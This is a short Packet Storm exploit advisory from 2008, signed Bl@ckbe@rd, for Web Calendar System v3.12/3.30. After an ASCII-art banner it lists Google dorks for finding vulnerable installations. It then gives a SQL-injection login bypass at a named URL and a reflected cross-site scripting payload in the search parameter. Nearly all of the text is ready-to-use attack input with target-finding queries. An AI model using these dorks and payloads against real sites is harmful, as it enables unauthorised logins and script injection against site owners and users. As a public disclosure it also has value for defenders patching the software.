webcalsys-sqlxss.txt

2008-11-29T00:00:00
ID PACKETSTORM:72380
Type packetstorm
Reporter Bl@ckbe@rd
Modified 2008-11-29T00:00:00

Description

                                        
                                            `000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000  
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0  
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0  
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0  
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0  
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0  
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0  
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0  
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000  
  
  
  
[+] Script : Web Calendar System v 3.12/3.30  
  
[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit)  
  
[+] Google Dork : intitle:Web Calendar system v 3.30 inurl:.asp  
[+] Google Dork : intitle:Web Calendar system v 3.12 inurl:.asp  
  
[+] Contact : blackbeard-sql@hotmail.fr  
  
  
--//--> Exploit :   
  
1) Remote Bypass Exploit :  
  
http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM  
  
username:' or '1'='1  
  
password:' or '1'='1  
  
2) Remote XSS exploit :   
  
In simple words :  
  
http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]  
  
  
`